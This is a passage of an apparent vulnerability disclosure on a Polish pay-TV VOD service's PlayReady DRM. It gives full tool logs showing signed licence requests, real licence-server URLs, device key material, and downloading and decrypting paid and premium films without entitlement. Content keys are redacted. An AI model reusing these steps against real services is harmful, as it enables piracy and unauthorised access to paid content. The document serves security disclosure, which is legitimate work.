448ab54c-d127-45f6-b651-4c59aee2f431 LicenseType: NonPersistent BeginDate: 2022-06-27T10:29:41.2331761 ExpirationDate: 2022-06-29T10:29:41.2331761 ErrorCode: 0 TransactionId: auto:56 ``` It was verified that the content for `ctitmim529714` asset could be obtained passed this date though (successful `downmp4` and `makemp4` commands issued on Jul 20, 2022). This implicates no synchronization between license server and the CDN (CDN should be aware that there was no valid license for serial number device that requested given resource (being part of a given asset). ### SCENARIO 5 (NO AUTH FOR LICENSE ACQUSITION) While STB client device should have limited access to VOD collections, it was verified that it could access any of them. For instance, no access should be possible to assets from the `CANAL+ Premium` collection: ``` [VOD LIBRARY] COL01 "PREMIERY VOD+" [Film] COL02 "CANAL+ Premium" COL03 * "ALE KINO+" COL04 "Movies Fun" COL05 "FOX PLAY" COL06 "FilmBox Live" COL07 "AXN NOW" COL08 "KINO ĹšWIAT" COL09 * "ROMANCE TV" COL0a * "NOVELAS+" ... ``` Yet, license acquisition and content download was successful as indicated by the following log: ``` msprcp> lscol COL02 2 ASSETS from 2/119 pages ctitcap591362 "[REC] 2" ctitcap572470 "[REC] 4: Apokalipsa" ctitcap596078 "@MIRIAMFROMPOLAND" ctitcap595998 "#Happy. Dyktatura szczÄ?Ĺ?cia w mediach spoĹ?ecznoĹ?ciowych" ctitcap591410 "10 dni z tatÄ?" ctitcap567613 "11 Minut" ctitcap565254 "11 wrzeĹ?nia - historie ocalaĹ?ych" ctitcap572390 "13 grzechĂłw" ctitcap505229 "13 Posterunek sezon II odc. 1" ctitcap505297 "13 Posterunek sezon II odc. 10" ctitcap505296 "13 Posterunek sezon II odc. 11" ... ctitcap567319 "303. Bitwa o AngliÄ?" msprcp> colasset ctitcap567319 ctitcap567319 "303. Bitwa o AngliÄ?" link: https://nvs1.ncplus.pl/go-stb/static/stb_content.json?productId%3D567319 ls_url: https://lsp1.ncplus.pl/kms/proxy msprcp> storeasset ctitcap567319 asset data stored to: content\ctitcap567319 msprcp> maninfo -A ctitcap567319 - downloading manifest MANIFEST: content\ctitcap567319\Manifest.ism SmoothStreamingMedia MajorVersion: 2 MinorVersion: 0 TimeScale: 10000000 Duration: 61642880000 [1h 42m 3644s] ProtectionHeader SystemID: 9A04F079-9840-4286-AB92-E65BE0885F95 WRMHEADER keylen: 16 algid: AESCTR kid 0000: bd 06 d6 db 2b c3 a5 43 a5 94 cf 8d 1c 1b e7 ee ....+..C........ la_url: https://api-ncplus.drm.insyscd.net/rightsmanager.asmx ds_id: 0000: 79 f0 04 9a 40 98 86 42 ab 92 e6 5b e0 88 5f 95 y...@..B...[.._. StreamIndex Type: audio Name: Oryginalny TimeScale: 10000000 Chunks: 3083 QualityLevels: 1 Url: QualityLevels({bitrate})/Fragments(Oryginalny={start time}) QualityLevel Index: 0 Bitrate: 125435 FourCC: AACL CodecPrivateData: 1190 SamplingRate: 48000 Channels: 2 BitsPerSample: 16 PacketSize: 4 AudioTag: 255 StreamIndex Type: audio Name: Polski TimeScale: 10000000 Chunks: 3083 QualityLevels: 1 Url: QualityLevels({bitrate})/Fragments(Polski={start time}) QualityLevel Index: 0 Bitrate: 125435 FourCC: AACL CodecPrivateData: 1190 SamplingRate: 48000 Channels: 2 BitsPerSample: 16 PacketSize: 4 AudioTag: 255 StreamIndex Type: text Name: text-1 TimeScale: 10000000 Chunks: 99 QualityLevels: 1 Url: QualityLevels({bitrate})/Fragments(text-1={start time}) StreamIndex Type: video Name: video TimeScale: 10000000 Chunks: 3083 QualityLevels: 5 Url: QualityLevels({bitrate})/Fragments(video={start time}) QualityLevel Index: 0 Bitrate: 400000 FourCC: AVC1 CodecPrivateData: 000000016742C015D901E08FEB01100000030010000003032E200030D400086478A8C01E2C5C900000000168CB8DC8 MaxWidth: 480 MaxHeight: 270 QualityLevel Index: 1 Bitrate: 600000 FourCC: AVC1 CodecPrivateData: 000000016742C01ED900C83BF88C0440000003004000000CB80800249F00064978A8C01E2C5C900000000168CB8DC8 MaxWidth: 800 MaxHeight: 450 QualityLevel Index: 2 Bitrate: 1000000 FourCC: AVC1 CodecPrivateData: 000000016742C01FD90040049B01100000030010000003032E06000F4240029FF8A8C01E3064900000000168CB8DC8 MaxWidth: 1024 MaxHeight: 576 QualityLevel Index: 3 Bitrate: 2000000 FourCC: AVC1 CodecPrivateData: 00000001674D401FF200A00B76022000000300200000065C50001E8480053FF151803C60C4480000000168EBEDC8 MaxWidth: 1280 MaxHeight: 720 QualityLevel Index: 4 Bitrate: 2499968 FourCC: AVC1 CodecPrivateData: 000000016764001FACE4014016EC0440000003004000000CB8100009896000347DE2A30078C188900000000168EBEDC9C0 MaxWidth: 1280 MaxHeight: 720 msprcp> getlicense -A ctitcap567319 generating new cert, device changed or not initialized - loading cached manifest - generating license req XML key (AES/CBC) iv 0000: 48 69 b8 f5 a3 dc 1c ee 30 ea 2c 04 5d de 6e c5 Hi......0.,.].n. key 0000: 57 7c 79 ad fd 93 be 07 c3 d9 09 e9 27 87 ed 8a W|y.........'... nonce 0000: 6d 51 28 2a d8 c5 1a a7 cc 34 2f 03 1c 89 45 34 mQ(*.....4/...E4 NONCE bVEoKtjFGqfMNC8DHIlFNA== KEYDATA /3xTymd6IO+C5+3oQgJT6FF6WaDGGs83MwOn3s1NI3PqZH7VPlTy3ZBxKT6+fRvRLa02Z5UvOBgCwlavlR2XFeaIQdwTUkP93T6ikwDWZXUWRvCUefpL1boUANTCok0z1slCtadY7se7ECHRz2BxenhcAfSTxmP+p1hoxNu+07A= CIPHERDATA SGm49aPcHO4w6iwEXd5uxZPsPZXn4pSqMLjGxUAx8vl9+G2EJjfWJpdZx54cLiq7jzZRa12hxan4XXpuM5HBjZsAsLGaH3M5y8y4398tn4lWtiHs7zJdqINBr9mJS+BWHCG5FXttiX/KZJJhpjVE1TyEMq4oNQCtHncLJKm5UY/mrEj/5DoadYTUdIB3LqZ0U2CsK353knub1hcdmuov6Cc4GL7Bk41fPQU/7gAty1jKqOjCWU+77CAn1DJX9Ym30vTw9aEixjx9nhROlVghBQ5bO1uZ+X4n91Pd8hEGJeB972G/ZAQ2dQ6gdrNzP1s2IcVPWKIPQMXICmykwYXXKFlAMRjceT//RXnLZKX8iPX9iJg0sa0wQFg3wrIugumVnnNu8q6CT3JKvZ98YOPZLhtzIsVYce77IfkF+WyrYPAtbyFgCquGE3QryT4gdGRum3Qh+o2Qd5DvM66PRy4bTIi7VpAon655COrdkfbkWD8qJS86N9cmoJsO9N92/f3DlLEbxgi/lSkOGTGdgDSYMGmrKtDLh+jsx/mcvOQo9JmWdn/sa6jY9Rh62mKL+qfW2cDApxd48XHLhIXbH5vcQeL32tZyx4mJnAJPXSazl6nAYd+yJLOZKo89U0bfv67zC5HKU392fTJwtg5Zc6ujzIwrOUn1+tCNcOv+1qZYhxVK8/E/Z53NLdOVRkP0THC+30jBozddS3V9y4Qm8uKBgf1GcN7knDNaH3qXZFlHJbeZ2bmXo1hqm3kK8Sz0EAWI9nqEuAO17+EKk74MvFkDFNR9c0mP3SOrarXw6glOT2cvZY0qkoa2jpqtxbKJHtK1LNlSQvb+6FoURGixhvbVTMbU49aV8pW3Tfmw49Tm/DTCQvJs7mY7pUXg3yYguif3hdiVmZFDyQYFDFjTwbQqdlNvqJ1YNX8iplAnJPX8am7B5cXvbbMHnCJEUvg73DrsX715ks3unYJL+DD9rihFxZvzbmrr0sLW7B2Jx3WSSadrvNgp9skTDQopW2TZR+n61aRxccpWtstVGYWN5eYWBFZzoDBnqni4NB+fxn6zTSUtiEJeIUS8ZmAEXZDn8ZoQHTHDJ+W3RN37d1yLMykYMz+LXAiWORT5fjs2Xkj0E6XVM/QqOXKM3aE0Nzq9MhXP6uNkgFgzJD4IewUj8cpfSwA7uevoMKYLXAgiEurRHpKJfdol1xgSWZmAfAyLSG6EuheodRyZhtJZlBu85XZInIgtU1GP0P7P04cxsk/9Atk6qe7KzRO/hDtgfBGIqpeUhrSUDxUWkczlvjAgKr+4O1sIaBhsluFtrX/hVSY2+12PlM9Xc+XGzoBZ2GhxcA9cHGAc1VjCuZJCfMbHYURXp0Yy2HDuQODFtBboolJLRTqR2x9qsat81dtjQjbdtrbpObSFFXJAzyxxZU390vhcJqhR1XNO/Guup8w+vi87BtdjM2H6YEgQc4tGl+D3Rx3OI5Jqx8FqpUdCW7D4Aebq3rFVHQ79cHnO8rSekKvxmg/9KFKAqISB0HOcLAauWkeef7WOLACd/EZeqUNWq8NO/jnU4dwYs6NJo5YELEjM0znoovj9uDDWoUrk9CrvpQ4bq9vJSyvl8qIM79YU6cTORIBQgo3EiDctZ+A0l8Jc9fFsv3ilm8qzmjEv/jd1EYwySZM2FmWZrTFkyssA28r9xzyhk9/q1Vc2SeMC/3QdnRT0G/ojp7niOj59zsiYFYQBTmsKC3xAqJ0Xx8Vs2hdCgJzAS4drQUjkj2jSU+LSMgEXRbdVHx+a556SigTjxJrQSWDOvLYHiA7RpIC3y21s+nvOIAp0ttzBa9ZlMvnv4TXPCevLinIEXOgnjwYBq8dFRanD0RxDIrtbmln9o4MCEAQDptU+eKEpZ/7FpY05uSX4H6+B3PGiKVuE1NE7eU264gY7ho1X5IDLVK70YDP0j/TX9aNPKeVIQhyw/W7AMiVKYlaOFH/1t+taMCnVeDK+SgzO/6YFu5RWQ5WOqSt3prf7LjPXFRInMUZjbEol5O2Z88k2uZEwWXlF3pJa7Cu8GhxpQCju399yEp8g0Y9u3lsVdx7XQLxD5HZIZwU/XtYWA5e1e7PmlTSi47IDBXuHX8fLjzirvgLo2n793Bk/43wdwiv3ud5hWcKdM5B/Rj4ZBF96Z2j/gs/tSQ2pnO0qt+w0KOGxhhQ79WMNn5P5vVLuc3j5suoQ3CbZuFLER9V0tJAPIQWD5koIgehcViRFCLAb2YFN5cVZR+Zx137jqMX7D2P/+3QqU/d+Xp6PsDtpzow/9qMuSPe12KphEmUclvZJ0RrNDQP9XOdns9yRBePKfjhGD+hEaq6RaIvgx0Z5oz/TeCfS09LgRzzJVaWUKdLynBsTdLd500YG61YU0Q6DOUpQxOEp4PH9qq9t9CE18LdLegln3n2ZSkvawoC7PRX3QGs6MeerHzBGyr31kO1HX/0WRAdk+1om5T/HYhBA4oANOgG/kCWLlwR53GucVmCQnwmHfrh9neuGXYcV7/hhuoHDJVstsLyp+9o5jgf1YktS6YkpNP1geyk78zmfnmzf+cFAL6dJ9qWNQF3cGgNZqP8TpxB0BE+KUGayHWW5q0PSoQ9q+WxX1UE2PyFHuGv+dq8N9Q4+oBd8GkKKKcwXIJh8CVof4YW25XZCF1zpDXzj2XIofC2zbU0yngXCdfXLPEz9+wVM8496SMMZPXBna52hy/wS/OLziUgKc3bCqB97fRWuOPGnL0XxrdPhy0GJGY5sRXLk92fPBtrJNnDH7ownDygXLsPg9mZMI2BW/gV8DL18Nks9cBvAQ8879kuIwOJdeFw+JfA+9yDtgos2l7WVvHeVJjYwNb8lg79q/2k9QeFsXLOuTB4Yo1W2eiBCJgfrNd18qfBxDwr/t1OelUxiR2FZ35OnYcPq4f6pE/cVw/cyalCNen/Igsu6TgXDiXrgNSSjCRU/cRhFOvzS1jfPJ20ArJjtz2AfDlMRAuUjGTijkxSVGZixfCcrbJ9FwPaqzqXXArVzrrQGYOUl+McQ2+3WnchpbBJLSe0dfA1u5XqtSNzLgNXmXPzJTJKcZ9LiHFWlXg34eEUmZvLBfFcdvwb+hekqpdxVGAxzqbu29k79/v7GDeYRJiLqQLOYz8C0sYBTaRlUAqEvv1NEgbh4+SKrvPEsLLX/aP/AqYiqLbvaWxsJm7P7tMc05oHBr4uWhvb3AWQi0BRk5pN7NxM/WpvsXpf4Mdc9PsiUm0tjHxrxM8c46PuPUxJeuqNgztzsMBO9IVA6qHEtkX7wRd1nBswZXRmy7cVTYQyJNg5qPjNEF5Kk4vzx0DIS0vszhz2WLfg4zJo5VL8ZJKu1mx+0vswYqNjGc6xagXT/oZhlvgGCeSduFzmRZr2t0e/EFV5+51B2KJxps8hbDDBX56GHAMoSiYn9OPq3yWEVam2XDNSQ+bnLdyrfy3o6ht9Huf6xpP1xnxUcYpIF6uXuDWL8BCe2a6Rt5sFhyb0mH3q7yYct6WBR9QSO2nmpOxazZ8Nk1aX6NM1LF65Vlzfhm2vy11VqQtz0K0dE6AvijukmgewiMegkIbSGBwXQVgPEpc/KoJlaOtV0T6/Yj+YlMuibVHqhHS/6X/FOspkr1lBtbcWqO1F6zH3lYHPeG6FTxedfwwiZ7m/jNyB23ovucBXXZBOiE+AXssG5XxdCFqMuvJ0cxgw4rPkw5NaueTRdOaIb4vFRakU03Gg9F3DEi2Tqucjt03C3ebd8M0r6LtWJ0JP6GrZMDA+xILdebp7j82BVIHfrPgc2P3h1MTajIQSIlRJkQMuhkjIrzb1uda5hjezBaLxsj0lOkoJUYaupJ2Tq2wZKmLvlsSg7dFxpRvJf5hKXvbWTpicnCFw= XML DIGEST ZMj1qVj+OplxpH8AtNtbaqlRtiSGETtvBC1Lo7Pg8yY= ecdsa digest 0000: 0c fb 3c 7b a1 a9 8a 6c b2 9a 4a c9 81 87 df cf ..<{...l..J..... 0010: 51 4b ea f9 91 d9 f4 98 0a 14 74 86 2a 7c eb ce QK........t.*|.. signature - r: 277ca8d09a8e5ceedb15c07e73acd8da0bfafcfedb683718b4f5e60cea0f72a6 - s: b6452b7000129732b2ddad686c23a6b139bcefad6c44d1586f569676cfacec42 XML SIGNATURE J3yo0JqOXO7bFcB+c6zY2gv6/P7baDcYtPXmDOoPcqa2RStwABKXMrLdrWhsI6axObzvrWxE0VhvVpZ2z6zsQg== PUBKEY HzRT52jiTwqGPAJgLRfkJM8Sj5ZrbSmnvnHxFInleK13N17+uumT8bvzebJ/HggAhv0bMOTPMzaCzKLiuO+coQ== - sending license req to: https://lsp1.ncplus.pl/kms/proxy LICENSE CUSTOM DATA UserToken: 135abf9b-7006-46f2-9b3f-52f5d79f361a-stb BrandGuid: 448ab54c-d127-45f6-b651-4c59aee2f431 LicenseType: NonPersistent BeginDate: 2022-07-19T09:50:53.9910965 ExpirationDate: 2022-07-21T09:50:53.9910965 ErrorCode: 0 TransactionId: auto:56 XMR LICENSE version: 3 attr: 0001 OuterContainer attr: 0036 Unknown data 0000: 00 00 00 39 00 00 00 18 d8 27 66 78 a6 c2 be 44 ...9.....'fx...D 0010: 8f 88 08 ae 25 5b 01 a7 ....%[.. attr: 0002 GlobalContainer attr: 000d Unknown data 0000: 00 01 .. attr: 0032 DWORD_Versioned data 0000: 00 00 00 41 ...A SecurityLevel level: SL2000 attr: 0009 KeyMaterialContainer ContentKey key_id 0000: bd 06 d6 db 2b c3 a5 43 a5 94 cf 8d 1c 1b e7 ee ....+..C........ v1: 1 v2: 3 enc_data_len: 0080 enc_data 0000: a1 a4 1a 99 d7 e1 fa 50 d6 dc 5a 4f 18 b2 b5 db .......P..ZO.... 0010: 0f d5 c9 01 67 a5 3a 7f 23 6c 80 df 3a d1 ce d8 ....g.:.#l..:... 0020: 25 ad f0 73 23 ce 2a 9b fd 4c b3 dd 18 6f a9 53 %..s#.*..L...o.S 0030: 18 7a 99 6f 26 ce e8 aa 6b b4 99 3e d0 cd c8 36 .z.o&...k..>...6 0040: 79 d7 f6 cb 92 17 c8 92 a9 59 9b 15 cc ef 43 f6 y........Y....C. 0050: 4b 8e ea ff e9 71 6d bb 95 1b 4a 6c 30 11 2c ed K....qm...Jl0.,. 0060: b2 0a 37 fe ab 24 e9 72 49 82 31 58 4f b3 38 86 ..7..$.rI.1XO.8. 0070: 1d 19 e7 64 13 a7 8a ea 1f 9f 35 61 02 f5 3f 0d ...d......5a..?. attr: 002a ECCDeviceKey data 0000: 00 01 00 40 d2 96 26 1e 5f 0b f2 4c c0 73 4d 76 ...@..&._..L.sMv 0010: c8 10 ac ef 7b 49 2c 16 04 07 8a 51 9c 6f 54 58 ....{I,....Q.oTX 0020: 6c bf be df ea a2 6c f7 29 cc 0f 74 75 d2 20 bd l.....l.)..tu... 0030: cf 64 fa 69 fa 9e f2 80 c5 66 f0 83 c3 a0 80 d5 .d.i.....f...... 0040: 70 df ca 0d p... attr: 000b Signature data 0000: 00 01 00 10 f1 5a aa 51 0a 11 8c 9a cb 1f 7f 16 .....Z.Q........ 0010: 7c 27 ec df |'.. content_key 0000: *REMOVED* msprcp> downmp4 -A ctitcap567319 -a audio=Oryginalny.0 -v video=4 -t 1:00+4 - parsing args audio name: Oryginalny audio quality: q0 video quality: q4 - loading cached manifest start time: 60 sec duration: 4 sec Downloading 3 fragments [###############################] msprcp> makemp4 -A ctitcap567319 -a audio=Oryginalny.0 -v video=4 -t 1:00+4 - parsing args audio name: Oryginalny audio quality: q0 video quality: q4 - loading cached manifest start time: 60 sec duration: 4 sec audio track id: 4 video_track_id: 8 - loading cached content key Processing (decrypt / append) 3 fragments [###############################] total A/V data: 1979860 ``` Successful license acquisition and content download was also verified for the `PREMIERY VOD+` collection, which normally requires rental (payment) for single movies as for `ctitpre525597` asset (priced at 9.99 PLN): ``` msprcp> assetinfo -A ctitpre525597 TVOD ASSET id: ctitpre525597 title: Alicja w krainie czarĂłw (HD) title_original: ALICE IN WONDERLAND allow: 31.08.2022 year: 2010 duration: 104 min price: 9.99 PLN vat: 23 url: http://r.cdn-ncplus.pl/ncplusgo04-voddrm01/PRE_20027959/PRE_20027959.ism/Manifest msprcp> getlicense -A ctitpre525597 - loading cached manifest - generating license req XML key (AES/CBC) iv 0000: 48 69 b8 f5 a3 dc 1c ee 30 ea 2c 04 5d de 6e c5 Hi......0.,.].n. key 0000: 57 7c 79 ad fd 93 be 07 c3 d9 09 e9 27 87 ed 8a W|y.........'... nonce 0000: 6d 51 28 2a d8 c5 1a a7 cc 34 2f 03 1c 89 45 34 mQ(*.....4/...E4 NONCE bVEoKtjFGqfMNC8DHIlFNA== KEYDATA /3xTymd6IO+C5+3oQgJT6FF6WaDGGs83MwOn3s1NI3PqZH7VPlTy3ZBxKT6+fRvRLa02Z5UvOBgCwlavlR2XFeaIQdwTUkP93T6ikwDWZXUWRvCUefpL1boUANTCok0z1slCtadY7se7ECHRz2BxenhcAfSTxmP+p1hoxNu+07A= CIPHERDATA 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 XML DIGEST AA8skfOk7kA9HQcijquMgirqKobrxjzyFWXJvrpa4GU= ecdsa digest 0000: 32 65 ed bb 1a ab 66 21 06 86 56 42 c8 0a e5 57 2e....f!..VB...W 0010: 69 52 1f ee 77 d8 0a ff 14 c9 9e 02 a4 c0 79 ae iR..w.........y. signature - r: 277ca8d09a8e5ceedb15c07e73acd8da0bfafcfedb683718b4f5e60cea0f72a6 - s: 124416970a533626a875f3550e2a3ebb3a3d15ea1404ceae361036732c9cc7ee XML SIGNATURE J3yo0JqOXO7bFcB+c6zY2gv6/P7baDcYtPXmDOoPcqYSRBaXClM2Jqh181UOKj67Oj0V6hQEzq42EDZzLJzH7g== PUBKEY HzRT52jiTwqGPAJgLRfkJM8Sj5ZrbSmnvnHxFInleK13N17+uumT8bvzebJ/HggAhv0bMOTPMzaCzKLiuO+coQ== - sending license req to: https://lsp1.ncplus.pl/kms/proxy LICENSE CUSTOM DATA UserToken: 135abf9b-7006-46f2-9b3f-52f5d79f361a-stb BrandGuid: 448ab54c-d127-45f6-b651-4c59aee2f431 LicenseType: NonPersistent BeginDate: 2022-07-19T10:06:29.3471657 ExpirationDate: 2022-07-21T10:06:29.3471657 ErrorCode: 0 TransactionId: auto:56 XMR LICENSE version: 3 attr: 0001 OuterContainer attr: 0036 Unknown data 0000: 00 00 00 39 00 00 00 18 d8 27 66 78 a6 c2 be 44 ...9.....'fx...D 0010: 8f 88 08 ae 25 5b 01 a7 ....%[.. attr: 0002 GlobalContainer attr: 000d Unknown data 0000: 00 01 .. attr: 0032 DWORD_Versioned data 0000: 00 00 00 41 ...A SecurityLevel level: SL2000 attr: 0009 KeyMaterialContainer ContentKey key_id 0000: 49 07 d5 7e 98 10 ea 4f 9f 3e ec d4 6a 30 96 9e I......O.>..j0.. v1: 1 v2: 3 enc_data_len: 0080 enc_data 0000: cd 3c 8f ad 99 6c 9f d6 4b 3d 71 f3 ba 30 8c 0e .<...l..K=q..0.. 0010: 97 0d f0 ea 0d f2 23 c7 bd 4f 4e ff a3 26 3e 5a ......#..ON..&>Z 0020: 2b e1 0c b2 f6 66 d9 33 13 17 86 18 73 45 28 56 +....f.3....sE(V 0030: 06 8e f1 a3 f4 ad e0 56 d3 9a 61 37 58 2c 7f 9a .......V..a7X,.. 0040: 68 f3 5d ee 28 f2 94 07 92 b7 fd 78 4d 37 dc 27 h.].(......xM7.' 0050: f4 07 dd ba e6 4e 31 8e 80 c8 91 60 b0 93 55 68 .....N1.......Uh 0060: 09 8b 29 80 7b 4a 7c 19 ee 66 98 bb b2 45 fa 10 ..).{J|..f...E.. 0070: d8 d3 94 a4 2e 80 06 02 c4 c4 69 a1 8c 14 40 17 ..........i...@. attr: 002a ECCDeviceKey data 0000: 00 01 00 40 d2 96 26 1e 5f 0b f2 4c c0 73 4d 76 ...@..&._..L.sMv 0010: c8 10 ac ef 7b 49 2c 16 04 07 8a 51 9c 6f 54 58 ....{I,....Q.oTX 0020: 6c bf be df ea a2 6c f7 29 cc 0f 74 75 d2 20 bd l.....l.)..tu... 0030: cf 64 fa 69 fa 9e f2 80 c5 66 f0 83 c3 a0 80 d5 .d.i.....f...... 0040: 70 df ca 0d p... attr: 000b Signature data 0000: 00 01 00 10 59 95 f5 b4 55 1b c2 fc b1 07 45 83 ....Y...U.....E. 0010: 9e d8 55 0e ..U. content_key 0000: *REMOVED* msprcp> downmp4 -A ctitpre525597 -a audio=Oryginalny.0 -v video=4 -t 1:00+4 - parsing args audio name: Oryginalny audio quality: q0 video quality: q4 - loading cached manifest start time: 60 sec duration: 4 sec Downloading 3 fragments [###############################] msprcp> makemp4 -A ctitpre525597 -a audio=Oryginalny.0 -v video=4 -t 1:00+4 - parsing args audio name: Oryginalny audio quality: q0 video quality: q4 - loading cached manifest start time: 60 sec duration: 4 sec audio track id: 3 video_track_id: 7 - loading cached content key Processing (decrypt / append) 3 fragments [###############################] total A/V data: 1950835 ``` All of the above implicates that: - no access check are done with respect to client device requesting a license to content, - whole VOD library could be compromised (18k+ assets in total). Finally, it is worth to mention that Manifest file for 4K content could be accessed too, but since it was slightly different than ISM files (`.mpd` DASH files), at this phase of the research, it was not possible to check whether acquiring license to 4K content was possible: ``` msprcp> assetinfo -A ctitzm4567954 